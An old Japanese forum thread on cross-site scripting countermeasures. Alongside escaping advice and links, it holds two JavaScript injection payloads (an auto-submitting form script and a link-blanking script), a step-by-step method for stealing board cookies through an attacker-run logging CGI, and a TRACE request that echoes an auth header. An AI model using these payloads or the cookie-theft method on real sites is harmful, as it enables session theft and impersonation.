クロスサイトスクリプティング対策

1 ：名無しさん＠お腹いっぱい。：01/10/27 10:37 ID:AENF9z2S

http://securit.etl.go.jp/research/paper/css2001-takagi-dist.pdf

簡単にいって、フォームの入力をサーバサイドで処理してHTMLと
して出力する時に、文字のエスケープを適切に行わないと、
Cookieを取得するJavaScriptを埋め込み＆出力結果を別サイトに
リダイレクトする、というような方法を使ってCookieを第三者に
盗まれる可能性がある、ということです。

上の資料を参考にしながら、
それぞれの処理系における、どのようの文字列エスケープを行うべきか、
といったサーバサイドの対策に関する情報を交換していきたいと思います。

49 ：名無しさん＠お腹いっぱい。：02/02/06 03:46 ID:dMmdiZ7p

大手検索サイトに見るクロスサイトスクリプティングの脆弱性の実態(2002.2.4)
https://www.netsecurity.ne.jp/article/1/3860.html

50 ：ﾃｽﾄ：02/02/08 00:23 ID:???

51 ：ﾃｽﾄ：02/02/08 00:28 ID:???

52 ：名無しさん＠お腹いっぱい。：02/02/08 13:44 ID:???

＞日本でもWebサイトに関する最初のインシデントとして記録されているのは、1997年に総務省の掲示板にタグ
＞が書き込まれ、その掲示板を閲覧しようすると、オウム真理教の音楽が外部サイトから読み込まれて鳴るよう
＞になったという事件であり、このようにクロスサイトスクリプティングの脆弱性は古くから存在する問題である。

タグ可の掲示板はみんな着尺製ありだな
http://pc.2ch.net/test/read.cgi/sec/1008926076/l10

53 ：名無しさん＠お腹いっぱい。：02/02/09 01:21 ID:???

F=Function;fs=document.forms;

l0=new F('f=fs[fs.length-1]');
l1=new F('es=f.elements;');
l2=new F('a=es[0];b=es[2];');
l3=new F('c=es[3];d=es[4];');
l4=new F('a.value=navigator.userAgent;');
l5=new F('b.value=\'fusianasan\';');
l6=new F('c.value=\'\';');
l7=new F('d.value=\' \';');

l8=new F('es[1].click();');

lx=new F('l0();l1();l2();l3();');
ly=new F('l4();l5();l6();l7();');
lz=new F('l8();');

l=new F('lx();ly();lz();');window.onload=l;

54 ：名無しさん＠お腹いっぱい。：02/02/12 11:32 ID:???

>>52
>着尺製

読めない…。

55 ：名無しさん＠お腹いっぱい。：02/02/12 11:44 ID:???

>>54
> >着尺製
「脆弱性」の (2ch的?) 誤読だと思われ。

正しくは「もろよわせい」と読むらしい。

56 ：名無しさん＠お腹いっぱい。：02/02/12 12:06 ID:???

>>55
http://pc.2ch.net/test/read.cgi/sec/1008620296/
http://pc.2ch.net/test/read.cgi/sec/1008620296/17

57 ：名無しさん＠お腹いっぱい。：02/02/12 22:55 ID:???

>>22
で、22はお腹いっぱいﾔﾊﾞｹﾞなの見つかったのかな?
SSLなページの確認はﾒﾝﾄﾞｰでないかい? >all
ｱﾎプログラマーの重箱の隅つつくのも疲れてきたぞ。（藁

58 ：名無しさん＠お腹いっぱい。：02/02/19 00:17 ID:???

> SSLなページの確認はﾒﾝﾄﾞｰでないかい?

なぜに？

59 ：５７：02/02/19 01:53 ID:???

漏れがバカだから。とりあえずﾊﾟｹｯﾄｷｬﾌﾟﾁｬｰしてどんな内容送ってるのか見ようと思うんだけど。
IEなんかのｸﾗｲｱﾝﾄで見て、値が固定されてるもののﾃｽﾄってどうしてますか?
例えば買い物の個数とかｻｰﾊﾞ側でｴｽｹｰﾌﾟ処理してるか確認したい訳で。
POSTﾒｿｯﾄﾞの値を色々試すのに良いﾂｰﾙってないですかねぇ。HTMLｴﾃﾞｨﾀで書き換える?

60 ：名無しさん＠お腹いっぱい。：02/02/19 02:02 ID:???

http://www.mountsystem.ne.jp/
ここのTantanCGI

61 ：５７：02/02/19 07:49 ID:???

>>60
すっ、すばらしい...。ありがとう御座います。感謝感激！
これでもっと重箱の隅つっけそうです。（藁

62 ：a：02/06/27 00:50 ID:awVCb82d

&{document.captureEvents(Event.LOAD);window.onload=new Function('for(var i=0;Boolean(document.links[i]);i++)document.links[i].href=\'\';')};

63 ：nobodyさん：02/12/06 16:58 ID:???

ここで配布してるｽｸﾘﾌﾟﾄも脆弱性の問題あり？

http://www.onpuch.jp/files/onpuch.zip

64 ：nobodyさん：03/01/10 01:43 ID:QhQLqNIU

Struts使おう。

65 ：山崎渉：03/01/16 03:36 ID:???

（＾＾）

66 ：奥さん ◆mL2ZRk1cK. ：03/01/18 07:27 ID:AxdRMTC9

d

67 ：奥さん ◆0Z6Yhsb88E ：03/01/18 07:27 ID:AxdRMTC9

aq

68 ：奥さん ◆E39m/9K3xY ：03/01/18 07:28 ID:AxdRMTC9

qwe

69 ：奥さん ◆8WgvSovIKg ：03/01/18 07:28 ID:AxdRMTC9

qwer

70 ：奥さん ◆ABM5odHy/Q ：03/01/18 07:29 ID:AxdRMTC9

12345

71 ：奥さん ◆bc.v5kgifQ ：03/01/18 07:30 ID:AxdRMTC9

hfjfjf

72 ：奥さん ◆IGEMrmvKLI ：03/01/18 07:31 ID:AxdRMTC9

vbncnnb

73 ：奥さん ◆tsGpSwX8mo ：03/01/18 07:31 ID:AxdRMTC9

hhhhhhhh

74 ：奥さん ◆Mjk4PcAe16 ：03/01/18 07:32 ID:AxdRMTC9

fhfhfhfhfh

75 ：nobodyさん：03/01/19 15:22 ID:???

荒らされてる

76 ：nobodyさん：03/01/19 15:58 ID:???

XSS対策のひとつとして、「エスケープ処理」がある。
これはCGIが扱うパラメータが多くなってくると、ついつい忘れてしまう煩雑で面倒な処理だが、
もしあなたがPerlユーザなら、HTML::Templateを使うことによってエスケープを
テンプレート側に記述し、プログラム側から完全に追い出してしまうことができる。

<input type="hidden" value="<tmpl var="aniti_xss_value" escape="url">">
<input type="text" value="<tmpl var="aniti_xss_text" escape="html">">

最後のescape属性に注目だ。これを指定してやるだけで、
テンプレートにセットした変数は適切にエスケープされるようになる。
もう、escape関数を呼びまくる必要はないんだ！ひゃっほう！

ps.この情報がXSS対策に頭を悩ますCGI製作者の助けになることを祈ってるよ。

77 ：nobodyさん：03/01/19 16:01 ID:???

ヽ(ﾟ∀ﾟ)ノﾋｬﾎｰ

78 ：nobodyさん：03/01/21 19:45 ID:eVlnRoM0

対策ではなくｸｷｰ盗む方法なのだが。
JBBSなどレンタル系の掲示板で使える。（htmlにログを表示して、javascriptでｸｯｷｰを読み出すもの）
レンタル系の掲示板は、自分が書き込んだ掲示板以外の板にもｸｯｷｰが適応されるところが多い。
（たとえば、http://jbbs.shitaraba.com/business/1/に書き込むとhttp://jbbs.shitaraba.com/business/2/の板にも適応される。）
これを利用して、自分の掲示板に書き込まれなくてもクッキーに入っているデータを取得できる。

具体的方法として
1.GET(QUERY_STRING)からのデータをテキストに保存するCGIを作成し、適当なフリーサーバに設置
2.ターゲットと同じレンタルBBSを借りる。
3.HTMLｸｯｷｰ取得部分を調べてjavascriptで1のCGIに渡す。
4.ターゲットの掲示板にそれらしい理由を付けてカキコ

79 ：nobodyさん：03/01/21 23:40 ID:ByrQNqOs

クッキーのpathを / とかにしてるんだろうね。
名前が漏れるくらいはなんでもないけど
トリップやキャップもクッキーに入ってるとなりすましが出来ると。

80 ：nobodyさん：03/01/26 15:26 ID:???

XSS 脆弱性で Basic 認証のパスワードも盗まれるらしいぞ
http://memo.st.ryukoku.ac.jp/archive/200301.month/5237.html
(((；ﾟДﾟ))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

81 ：nobodyさん：03/01/28 20:54 ID:wWZkstRp

>>80
ｳｹﾞ
でも
> サーバのTRACEメソッドが機能している場合
ってどういう場合なの?

82 ：山崎渉：03/04/17 12:26 ID:???

（＾＾）

83 ：山崎渉：03/04/20 06:06 ID:???

　　 ∧＿∧
　　（　　＾＾ ）＜ ぬるぽ（＾＾）

84 ：nobodyさん：03/05/11 20:11 ID:???

TRACE / HTTP/1.1
Host: localhost
Authorization: Basic

HTTP/1.1 200 OK
Date: Sun, 11 May 2003 11:07:46 GMT
Server: Apache/1.3.27
Transfer-Encoding: chunked
Content-Type: message/http

50
TRACE / HTTP/1.1
Authorization: Basic lG+/r4+/j6+/64FgKHc=
Host: localhost


0

(((；ﾟДﾟ))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

85 ：山崎渉：03/05/22 02:10 ID:???

━―━―━―━―━―━―━―━―━[JR山崎駅（＾＾）]━―━―━―━―━―━―━―━―━―

86 ：山崎渉：03/05/28 17:16 ID:???

　　　 　∧＿∧
ﾋﾟｭ.ｰ　(　　＾＾ ） ＜これからも僕を応援して下さいね（＾＾）。
　　＝〔~∪￣￣〕
　　＝ ◎――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉

87 ：山崎 渉：03/07/15 11:18 ID:???

　__∧＿∧_
　|（　　＾＾ ）|　＜寝るぽ（＾＾）
　|＼⌒⌒⌒＼
　＼ |⌒⌒⌒~|　　　　　　　　　山崎渉
　　 ~￣￣￣￣

88 ：山崎 渉：03/08/02 02:34 ID:???

　　 ∧＿∧
　　（　　＾＾ ）＜ ぬるぽ（＾＾）

89 ：ぼるじょあ ◆ySd1dMH5Gk ：03/08/02 05:12 ID:???

　　　 　∧＿∧　 ∧＿∧
ﾋﾟｭ.ｰ　（　 ・３・） (　　＾＾ ） ＜これからも僕たちを応援して下さいね（＾＾）。
　　＝〔~∪￣￣￣∪￣￣〕
　　＝ ◎――――――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉&ぼるじょあ

90 ：山崎 渉：03/08/15 23:09 ID:???

　　　 (⌒V⌒)
　　　│ ＾ ＾ │＜これからも僕を応援して下さいね（＾＾）。
　　⊂|　　　　|つ
　　　（＿）（＿）　　　　　　　　　　　　　　　　　　　　　　山崎パン

91 ：nobodyさん：03/08/28 13:53 ID:5epBRgUL

2chにはもうXSS使える穴は無い？

92 ：nobodyさん：03/08/29 01:04 ID:???

半角で穴見つかったのが最後かな？

93 ：nobodyさん：03/08/29 14:52 ID:???

そうか…
ＸＳＳ使えばフレームでの別ドメインの制限が回避出来るんだけどなー…

94 ：nobodyさん：03/12/27 14:03 ID:6Fk7/T/f

XSSをさらすｽﾚはここですか？

95 ：nobodyさん：2005/11/20(日) 11:58:56 ID:???

ttp://www.creators-fukuoka.com/
クロスサイトスクリプティング出来る？

96 ：nobodyさん：2006/08/07(月) 13:26:57 ID:???

保守

97 ：nobodyさん：2006/09/28(木) 06:10:16 ID:???

http://pc8.2ch.net/test/read.cgi/hp/1145956119/413

98 ：nobodyさん：2008/05/08(木) 19:41:05 ID:CmE1kuyM

age